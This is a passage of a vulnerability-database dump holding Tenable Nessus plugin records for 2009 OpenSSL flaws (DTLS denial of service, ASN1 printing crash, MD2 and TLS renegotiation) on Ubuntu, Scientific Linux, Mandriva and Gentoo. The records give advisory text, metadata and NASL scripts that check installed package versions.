pkgver:\"0.9.8a-7ubuntu0.9\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libssl0.9.8\", pkgver:\"0.9.8a-7ubuntu0.9\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libssl0.9.8-dbg\", pkgver:\"0.9.8a-7ubuntu0.9\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"openssl\", pkgver:\"0.9.8a-7ubuntu0.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libssl-dev\", pkgver:\"0.9.8g-4ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libssl0.9.8\", pkgver:\"0.9.8g-4ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libssl0.9.8-dbg\", pkgver:\"0.9.8g-4ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"openssl\", pkgver:\"0.9.8g-4ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"openssl-doc\", pkgver:\"0.9.8g-4ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libssl-dev\", pkgver:\"0.9.8g-10.1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libssl0.9.8\", pkgver:\"0.9.8g-10.1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libssl0.9.8-dbg\", pkgver:\"0.9.8g-10.1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"openssl\", pkgver:\"0.9.8g-10.1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"openssl-doc\", pkgver:\"0.9.8g-10.1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libssl-dev\", pkgver:\"0.9.8g-15ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libssl0.9.8\", pkgver:\"0.9.8g-15ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libssl0.9.8-dbg\", pkgver:\"0.9.8g-15ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"openssl\", pkgver:\"0.9.8g-15ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"openssl-doc\", pkgver:\"0.9.8g-15ubuntu3.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libssl-dev / libssl0.9.8 / libssl0.9.8-dbg / openssl / openssl-doc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:02:11", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=475798", "https://bugzilla.redhat.com/show_bug.cgi?id=479817", "https://bugzilla.redhat.com/show_bug.cgi?id=457134", "http://www.nessus.org/u?cd1796f1", "https://bugzilla.redhat.com/show_bug.cgi?id=472440"], "pluginID": "60658", "description": "CVE-2009-0590 openssl: ASN1 printing crash\n\nCVE-2009-1377 OpenSSL: DTLS epoch record buffer memory DoS\n\nCVE-2009-1378 OpenSSL: DTLS fragment handling memory DoS\n\nCVE-2009-1379 OpenSSL: DTLS pointer use-after-free flaw (DoS)\n\nCVE-2009-1386 openssl: DTLS NULL deref crash on early ChangeCipherSpec request\n\nCVE-2009-1387 openssl: DTLS out-of-sequence message handling NULL deref DoS\n\nMultiple denial of service flaws were discovered in OpenSSL's DTLS implementation. A remote attacker could use these flaws to cause a DTLS server to use excessive amounts of memory, or crash on an invalid memory access or NULL pointer dereference. (CVE-2009-1377, CVE-2009-1378,\n\nCVE-2009-1379, CVE-2009-1386, CVE-2009-1387)\n\nNote: These flaws only affect applications that use DTLS. Scientific Linux does not ship any DTLS client or server applications.\n\nAn input validation flaw was found in the handling of the BMPString and UniversalString ASN1 string types in OpenSSL's ASN1_STRING_print_ex() function. An attacker could use this flaw to create a specially crafted X.509 certificate that could cause applications using the affected function to crash when printing certificate contents. (CVE-2009-0590)\n\nNote: The affected function is rarely used. No application shipped with Scientific Linux calls this function, for example.\n\nThese updated packages also fix the following bugs :\n\n - 'openssl smime -verify -in' verifies the signature of the input file and the '-verify' switch expects a signed or encrypted input file. Previously, running openssl on an S/MIME file that was not encrypted or signed caused openssl to segfault. With this update, the input file is now checked for a signature or encryption. Consequently, openssl now returns an error and quits when attempting to verify an unencrypted or unsigned S/MIME file.\n (BZ#472440)\n\n - when generating RSA keys, pairwise tests were called even in non-FIPS mode. This prevented small keys from being generated. With this update, generating keys in non-FIPS mode no longer calls the pairwise tests and keys as small as 32-bits can be generated in this mode.\n Note: In FIPS mode, pairwise tests are still called and keys generated in this mode must still be 1024-bits or larger. (BZ#479817)\n\nAs well, these updated packages add the following enhancements :\n\n - both the libcrypto and libssl shared libraries, which are part of the OpenSSL FIPS module, are now checked for integrity on initialization of FIPS mode. (BZ#475798)\n\n - an issuing Certificate Authority (CA) allows multiple certificate templates to inherit the CA's Common Name (CN). Because this CN is used as a unique identifier, each template had to have its own Certificate Revocation List (CRL). With this update, multiple CRLs with the same subject name can now be stored in a X509_STORE structure, with their signature field being used to distinguish between them. (BZ#457134)\n\n - the fipscheck library is no longer needed for rebuilding the openssl source RPM. (BZ#475798)", "edition": 5, "reporter": "Tenable", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : openssl on SL5.x i386/x86_64", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1387", "CVE-2009-1378", "CVE-2009-0590"], "modified": "2016-12-14T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20090902_OPENSSL_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60658", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60658);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2016/12/14 20:33:26 $\");\n\n script_cve_id(\"CVE-2009-0590\", \"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\", \"CVE-2009-1386\", \"CVE-2009-1387\");\n\n script_name(english:\"Scientific Linux Security Update : openssl on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2009-0590 openssl: ASN1 printing crash\n\nCVE-2009-1377 OpenSSL: DTLS epoch record buffer memory DoS\n\nCVE-2009-1378 OpenSSL: DTLS fragment handling memory DoS\n\nCVE-2009-1379 OpenSSL: DTLS pointer use-after-free flaw (DoS)\n\nCVE-2009-1386 openssl: DTLS NULL deref crash on early ChangeCipherSpec\nrequest\n\nCVE-2009-1387 openssl: DTLS out-of-sequence message handling NULL\nderef DoS\n\nMultiple denial of service flaws were discovered in OpenSSL's DTLS\nimplementation. A remote attacker could use these flaws to cause a\nDTLS server to use excessive amounts of memory, or crash on an invalid\nmemory access or NULL pointer dereference. (CVE-2009-1377,\nCVE-2009-1378,\n\nCVE-2009-1379, CVE-2009-1386, CVE-2009-1387)\n\nNote: These flaws only affect applications that use DTLS. Scientific\nLinux does not ship any DTLS client or server applications.\n\nAn input validation flaw was found in the handling of the BMPString\nand UniversalString ASN1 string types in OpenSSL's\nASN1_STRING_print_ex() function. An attacker could use this flaw to\ncreate a specially crafted X.509 certificate that could cause\napplications using the affected function to crash when printing\ncertificate contents. (CVE-2009-0590)\n\nNote: The affected function is rarely used. No application shipped\nwith Scientific Linux calls this function, for example.\n\nThese updated packages also fix the following bugs :\n\n - 'openssl smime -verify -in' verifies the signature of\n the input file and the '-verify' switch expects a signed\n or encrypted input file. Previously, running openssl on\n an S/MIME file that was not encrypted or signed caused\n openssl to segfault. With this update, the input file is\n now checked for a signature or encryption. Consequently,\n openssl now returns an error and quits when attempting\n to verify an unencrypted or unsigned S/MIME file.\n (BZ#472440)\n\n - when generating RSA keys, pairwise tests were called\n even in non-FIPS mode. This prevented small keys from\n being generated. With this update, generating keys in\n non-FIPS mode no longer calls the pairwise tests and\n keys as small as 32-bits can be generated in this mode.\n Note: In FIPS mode, pairwise tests are still called and\n keys generated in this mode must still be 1024-bits or\n larger. (BZ#479817)\n\nAs well, these updated packages add the following enhancements :\n\n - both the libcrypto and libssl shared libraries, which\n are part of the OpenSSL FIPS module, are now checked for\n integrity on initialization of FIPS mode. (BZ#475798)\n\n - an issuing Certificate Authority (CA) allows multiple\n certificate templates to inherit the CA's Common Name\n (CN). Because this CN is used as a unique identifier,\n each template had to have its own Certificate Revocation\n List (CRL). With this update, multiple CRLs with the\n same subject name can now be stored in a X509_STORE\n structure, with their signature field being used to\n distinguish between them. (BZ#457134)\n\n - the fipscheck library is no longer needed for rebuilding\n the openssl source RPM. (BZ#475798)\"\n );\n # http://listserv.fnal.gov/scripts/wa.exe?A2=ind0909&L=scientific-linux-errata&T=0&P=1445\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd1796f1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=457134\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=472440\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=475798\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=479817\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected openssl, openssl-devel and / or openssl-perl\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"openssl-0.9.8e-12.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openssl-devel-0.9.8e-12.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openssl-perl-0.9.8e-12.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:08:12", "references": ["http://marc.info/?l=openssl-cvs&m=124508133203041&w=2", "https://qa.mandriva.com/54349"], "pluginID": "42996", "description": "Multiple security vulnerabilities has been identified and fixed in OpenSSL :\n\nThe dtls1_buffer_record function in ssl/d1_pkt.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allows remote attackers to cause a denial of service (memory consumption) via a large series of future epoch DTLS records that are buffered in a queue, aka DTLS record buffer limitation bug. (CVE-2009-1377)\n\nMultiple memory leaks in the dtls1_process_out_of_seq_message function in ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allow remote attackers to cause a denial of service (memory consumption) via DTLS records that (1) are duplicates or (2) have sequence numbers much greater than current sequence numbers, aka DTLS fragment handling memory leak. (CVE-2009-1378)\n\nUse-after-free vulnerability in the dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL 1.0.0 Beta 2 allows remote attackers to cause a denial of service (openssl s_client crash) and possibly have unspecified other impact via a DTLS packet, as demonstrated by a packet from a server that uses a crafted server certificate (CVE-2009-1379).\n\nssl/s3_pkt.c in OpenSSL before 0.9.8i allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a DTLS ChangeCipherSpec packet that occurs before ClientHello (CVE-2009-1386).\n\nThe dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL before 1.0.0 Beta 2 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence DTLS handshake message, related to a fragment bug.\n(CVE-2009-1387)\n\nThe NSS library library before 3.12.3, as used in Firefox; GnuTLS before 2.6.4 and 2.7.4; OpenSSL 0.9.8 through 0.9.8k; and other products support MD2 with X.509 certificates, which might allow remote attackers to spooof certificates by using MD2 design flaws to generate a hash collision in less than brute-force time. NOTE: the scope of this issue is currently limited because the amount of computation required is still large (CVE-2009-2409).\n\nA regression was found with the self signed certificate signatures checking after applying the fix for CVE-2009-2409. An upstream patch has been applied to address this issue.\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0 customers\n\nThe updated packages have been patched to prevent this.", "edition": 6, "reporter": "Tenable", "published": "2009-12-04T00:00:00", "title": "Mandriva Linux Security Advisory : openssl (MDVSA-2009:310)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-2409", "CVE-2009-1387", "CVE-2009-1378"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:openssl", "p-cpe:/a:mandriva:linux:lib64openssl0.9.8-static-devel", "p-cpe:/a:mandriva:linux:libopenssl0.9.8-devel", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:libopenssl0.9.8-static-devel", "p-cpe:/a:mandriva:linux:lib64openssl0.9.8", "p-cpe:/a:mandriva:linux:libopenssl0.9.8", "p-cpe:/a:mandriva:linux:lib64openssl0.9.8-devel"], "id": "MANDRIVA_MDVSA-2009-310.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=42996", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:310. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42996);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/07/19 20:59:16\");\n\n script_cve_id(\"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\", \"CVE-2009-1386\", \"CVE-2009-1387\", \"CVE-2009-2409\");\n script_bugtraq_id(35001, 35138, 35174, 35417);\n script_xref(name:\"MDVSA\", value:\"2009:310\");\n\n script_name(english:\"Mandriva Linux Security Advisory : openssl (MDVSA-2009:310)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple security vulnerabilities has been identified and fixed in\nOpenSSL :\n\nThe dtls1_buffer_record function in ssl/d1_pkt.c in OpenSSL 0.9.8k and\nearlier 0.9.8 versions allows remote attackers to cause a denial of\nservice (memory consumption) via a large series of future epoch DTLS\nrecords that are buffered in a queue, aka DTLS record buffer\nlimitation bug. (CVE-2009-1377)\n\nMultiple memory leaks in the dtls1_process_out_of_seq_message function\nin ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allow\nremote attackers to cause a denial of service (memory consumption) via\nDTLS records that (1) are duplicates or (2) have sequence numbers much\ngreater than current sequence numbers, aka DTLS fragment handling\nmemory leak. (CVE-2009-1378)\n\nUse-after-free vulnerability in the dtls1_retrieve_buffered_fragment\nfunction in ssl/d1_both.c in OpenSSL 1.0.0 Beta 2 allows remote\nattackers to cause a denial of service (openssl s_client crash) and\npossibly have unspecified other impact via a DTLS packet, as\ndemonstrated by a packet from a server that uses a crafted server\ncertificate (CVE-2009-1379).\n\nssl/s3_pkt.c in OpenSSL before 0.9.8i allows remote attackers to cause\na denial of service (NULL pointer dereference and daemon crash) via a\nDTLS ChangeCipherSpec packet that occurs before ClientHello\n(CVE-2009-1386).\n\nThe dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in\nOpenSSL before 1.0.0 Beta 2 allows remote attackers to cause a denial\nof service (NULL pointer dereference and daemon crash) via an\nout-of-sequence DTLS handshake message, related to a fragment bug.\n(CVE-2009-1387)\n\nThe NSS library library before 3.12.3, as used in Firefox; GnuTLS\nbefore 2.6.4 and 2.7.4; OpenSSL 0.9.8 through 0.9.8k; and other\nproducts support MD2 with X.509 certificates, which might allow remote\nattackers to spooof certificates by using MD2 design flaws to generate\na hash collision in less than brute-force time. NOTE: the scope of\nthis issue is currently limited because the amount of computation\nrequired is still large (CVE-2009-2409).\n\nA regression was found with the self signed certificate signatures\nchecking after applying the fix for CVE-2009-2409. An upstream patch\nhas been applied to address this issue.\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers\n\nThe updated packages have been patched to prevent this.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://marc.info/?l=openssl-cvs&m=124508133203041&w=2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://qa.mandriva.com/54349\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl0.9.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl0.9.8-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl0.9.8-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0.9.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0.9.8-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0.9.8-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64openssl0.9.8-0.9.8e-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64openssl0.9.8-devel-0.9.8e-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64openssl0.9.8-static-devel-0.9.8e-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libopenssl0.9.8-0.9.8e-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libopenssl0.9.8-devel-0.9.8e-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libopenssl0.9.8-static-devel-0.9.8e-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"openssl-0.9.8e-8.4mdv2008.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:03:27", "references": ["https://security.gentoo.org/glsa/200912-01"], "pluginID": "42968", "description": "The remote host is affected by the vulnerability described in GLSA-200912-01 (OpenSSL: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been reported in OpenSSL:\n Marsh Ray of PhoneFactor and Martin Rex of SAP independently reported that the TLS protocol does not properly handle session renegotiation requests (CVE-2009-3555).\n The MD2 hash algorithm is no longer considered to be cryptographically strong, as demonstrated by Dan Kaminsky. Certificates using this algorithm are no longer accepted (CVE-2009-2409).\n Daniel Mentz and Robin Seggelmann reported the following vulnerabilities related to DTLS: A use-after-free flaw (CVE-2009-1379) and a NULL pointer dereference (CVE-2009-1387) in the dtls1_retrieve_buffered_fragment() function in src/d1_both.c, multiple memory leaks in the dtls1_process_out_of_seq_message() function in src/d1_both.c (CVE-2009-1378), and a processing error related to a large amount of DTLS records with a future epoch in the dtls1_buffer_record() function in ssl/d1_pkt.c (CVE-2009-1377).\n Impact :\n\n A remote unauthenticated attacker, acting as a Man in the Middle, could inject arbitrary plain text into a TLS session, possibly leading to the ability to send requests as if authenticated as the victim. A remote attacker could furthermore send specially crafted DTLS packages to a service using OpenSSL for DTLS support, possibly resulting in a Denial of Service. Also, a remote attacker might be able to create rogue certificates, facilitated by a MD2 collision. NOTE: The amount of computation needed for this attack is still very large.\n Workaround :\n\n There is no known workaround at this time.", "edition": 6, "reporter": "Tenable", "published": "2009-12-02T00:00:00", "title": "GLSA-200912-01 : OpenSSL: Multiple vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1379", "CVE-2009-1377", "CVE-2009-2409", "CVE-2009-1387", "CVE-2009-1378", "CVE-2009-3555"], "modified": "2018-07-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:openssl", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200912-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=42968", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200912-01.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42968);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/07/11 17:09:26\");\n\n script_cve_id(\"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\", \"CVE-2009-1387\", \"CVE-2009-2409\", \"CVE-2009-3555\");\n script_bugtraq_id(35001, 35138, 35417, 36935);\n script_xref(name:\"GLSA\", value:\"200912-01\");\n\n script_name(english:\"GLSA-200912-01 : OpenSSL: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200912-01\n(OpenSSL: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been reported in OpenSSL:\n Marsh Ray of PhoneFactor and Martin Rex of SAP independently\n reported that the TLS protocol does not properly handle session\n renegotiation requests (CVE-2009-3555).\n The MD2 hash algorithm is no longer considered to be\n cryptographically strong, as demonstrated by Dan Kaminsky. Certificates\n using this algorithm are no longer accepted (CVE-2009-2409).\n Daniel Mentz and Robin Seggelmann reported the following\n vulnerabilities related to DTLS: A use-after-free flaw (CVE-2009-1379)\n and a NULL pointer dereference (CVE-2009-1387) in the\n dtls1_retrieve_buffered_fragment() function in src/d1_both.c, multiple\n memory leaks in the dtls1_process_out_of_seq_message() function in\n src/d1_both.c (CVE-2009-1378), and a processing error related to a\n large amount of DTLS records with a future epoch in the\n dtls1_buffer_record() function in ssl/d1_pkt.c\n (CVE-2009-1377).\n \nImpact :\n\n A remote unauthenticated attacker, acting as a Man in the Middle, could\n inject arbitrary plain text into a TLS session, possibly leading to the\n ability to send requests as if authenticated as the victim. A remote\n attacker could furthermore send specially crafted DTLS packages to a\n service using OpenSSL for DTLS support, possibly resulting in a Denial\n of Service. Also, a remote attacker might be able to create rogue\n certificates, facilitated by a MD2 collision. NOTE: The amount of\n computation needed for this attack is still very large.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200912-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All OpenSSL users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/openssl-0.9.8l-r2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n 